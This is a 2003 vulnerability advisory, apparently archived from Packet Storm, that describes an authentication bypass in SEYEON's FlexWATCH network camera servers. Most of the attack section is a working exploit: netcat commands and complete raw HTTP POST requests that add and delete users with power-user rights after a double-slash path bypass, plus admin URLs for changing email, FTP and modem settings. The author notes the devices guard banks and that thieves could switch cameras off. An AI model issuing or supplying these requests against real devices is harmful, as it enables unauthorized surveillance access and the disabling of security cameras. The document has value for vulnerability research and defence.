The FlexWATCH surveillance camera server is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, and more.
4dfc8429dbb28abe088145db865dc9a76237fec3689cc388ec2968f37e7ed819
------------------ u0xa ------------------------
Author: SLAIZER
mail: slaizer[at]phreaker.net
Date: Sun/Oct/26/2003
-------"Another way of seeing the things"--------
-------------------------------------------------
Unauthorized access Vulnerability in FlexWATCH camera Server.
-----------------------------------------------------------
Vendor:
-------
·SEYEON Technology
·FlexWATCH Network Video Server
Url: https://www.flexwatch.com/
Mail: sytech@seyeon.co.kr
Product:
--------
All versions web based configuration utility.
I tested on SYS_MODEL = 132
FlexWATCH is a Camera Server entrusted to centralize for Web Administration .
It´s very frequently used by safety companies , banks , parks and comercial centres.
Description :
-------------
[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://victim/index.htm
Age: 0
*First:
For default , you can read the source at index page and see that :
<!-- You can modify here for user information. -->
<!-- ex) ID:guest, PASSWORD:guest -->
Many System Use this user and password , but that isn´t important .
I found that :
------------u0xa-----------
}
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }
function select_sample()
------------u0xa-----------
<This is a autentification-javascript>
Url: admin/aindex.htm is a web based configuration .
*I read more source pages , and see :
-----------u0xa------------
<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>
-----------u0xa------------
ummMm I want read stream.jar :
[Necora@eviluser]$ jar xf stream.jar
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class <---- (C:
MIMEBase64.class <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class <----- For now any cgi-url
StrCan.class
StreamCgi.class <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-
·It´s enough to know how the system works , authoritation , cgi , crypt..
---------------------------
*Second seen https://victim/live.html
and find that :
------------u0xa------------
<script language = "JavaScript" src="sysinfo.js"></script>
------------u0xa------------
This contain info from the System :
//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";
//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";
//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;
var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";
var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;
-----------------------
*Some time ago , i read a Security Vulnerability in Boa , how can obtain access in privileged directory with '//'
Example :
https://victim//privileged.html <--- ok?
*The Access camera url :
------------------------
https://victim//app/sample/ab1.html
Wow! first access granted ! , now you have got identify in java-application .
But... why to search more there? if we can play with administration´s site o web, let´s try
https://victim//admin/aindex.htm <---- Interesting....
Now it´s very easy :D ,
·Add a User for view cameras :
------------------------------
https://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>
[Necora@eviluser]$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK
\n\n
**********************************************************************
-Wow! New user add : user= slaizer password= root123 group=POWER_USER*
**********************************************************************
*Note : Exist diferent Groups for add user : guest , User and Power_User .
At default only guest group can access remotely , you change this in :
https://victim//admin/asp/chglimit.asp
·How to delete user :
------------------
https://victim//admin/asp/deluser.asp
[Necora@eviluser]$nc victim 80
POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK
\n\n
**********************
-User slaizer deleted*
**********************
------------------------------------------------|
Now you have access to watch all cameras :-D ! |
Too you can reboot , edit configuration ... |
|
|
https://victim/app/sample/ab1.html |
|
-Login=slaizer password=root123- |
________________________________________________|
Examples :
·Configure e-mail adrees for send config :
https://victim//admin/fset/fset_email.htm
·Configure FTP for send a "evil-config" troyan-cgi/asp conf .. blah blah.
https://victim//admin/fset/fset_ftp.htm
·Edit modem configuration for phreakers :)
https://victim//admin/fset/fset_modem.htm
·CHange Camera Names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!
https://victim//admin/aindex.htm
<Imagination , coffee and time.>
Possible solutions :
--------------------
·Activate the firewall to admit alone connections since the client that we want.
·Not to trust in the autentificacion on part of the client ( javascripts..)
·SEYEON invest in the safety ... a thief might use it to deactivate the cameras in a theft ...
************************
Greetz! :
:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi
:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::
For aLL :
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\
************************
*******************************
*Sorry for orthographic errors*
*******************************
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed